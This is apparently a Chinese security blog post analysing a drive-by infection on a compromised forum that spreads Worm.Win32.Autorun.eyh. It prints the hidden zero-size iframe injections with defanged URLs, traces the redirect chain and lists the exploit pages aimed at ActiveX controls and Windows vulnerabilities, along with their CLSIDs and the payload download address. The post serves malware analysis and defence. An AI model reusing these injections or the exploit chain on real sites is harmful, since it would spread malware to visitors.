某论坛挂马Worm.Win32.Autorun.eyh

简介: 某论坛挂马Worm.Win32.Autorun.eyh

论坛网页包含代码:

/---

<iframe width='0' height='0' src='hxxp://www.5**4*z**c.cn/1**7aq/q.js'></iframe>

---/

hxxp://www.5**4*z**c.cn/1**7aq/q.js

输出代码:

/---

<IFRaME src="hxxp://m**.sf*s3**wws.cn/03/x4.htm" width=1 height=0></IFRAME>

hxxp://m**.sf*s3**wws.cn/03/x4.htm

包含代码:

/---

<iframe src=google.htm width=100 height=0></Iframe>

---/

hxxp://m**.sf*s3**wws.cn/03/google.htm

采用了一种先前没见过的加密方法,开头一段代码为:

/---

<hTmL><hEaD><Meta Name=Encoder Content=HTMLSHIP>

---/

其功能是:检测浏览器软件类型,如果是IE浏览器,则显示ie.swf,否则显示ff.swf;然后输出代码:

/---

<iframe src=all.htm width=100 height=0></iframe>

---/

hxxp://m**.sf*s3**wws.cn/03/all.htm

采用了相同的加密方法:

用<iframe>引入下列网页,利用漏洞下载hxxp://d1.csygg.com/01/g.exe:

1.htm

利用MS-06014漏洞

kdosn.htm

利用Qvod Player 播放器(clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF)漏洞

kc.htm

利用Baidu工具条(cLSiD:{A7F05EE4-0426-454F-8013-C41E3596E9E9})漏洞下载hxxp://d1.csygg.com/01/Baidu.cab

newlz.htm

利用联众(GLIEDown.IEDown.1,clsid:F917534D-535B-416B-8E8F-0C04756C31A8)漏洞

s.htm

利用新浪(Downloader.DLoader.1,clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A)漏洞

office.htm

利用MS Office(snpvw.Snapshot Viewer Control.1)漏洞

bf.htm

利用暴风影音(MPS.StormPlayer,)漏洞

cx.htm

利用超星阅览器(Pdg2)漏洞

uu.htm

UUSEE网络电视(UUUPGRADE.UUUpgradeCtrl.1)漏洞

2.htm

利用联众世界(HanGamePluginCn18.HanGamePluginCn18.1)漏洞

3.htm

4.htm

利用RealPlayer(IERPCtl.IERPCtl.1)漏洞

0.htm

利用(clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365)漏洞

5.htm

利用MS09-002 漏洞


相关文章
|
3月前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
|
3月前
|
安全
利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站
利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站
|
3月前
|
缓存 算法 网络协议
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
|
3月前
|
安全 网络协议
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
|
3月前
|
安全 JavaScript 前端开发
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
|
3月前
|
Web App开发 安全
某县农业信息网挂马 Worm.Win32.AutoRun.umf
某县农业信息网挂马 Worm.Win32.AutoRun.umf
|
3月前
|
安全 数据安全/隐私保护
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
|
3月前
|
开发框架 安全 .NET
X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
|
3月前
|
安全 JavaScript 前端开发
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
某笑话网站挂马Trojan-Downloader.Win32.Agent.rub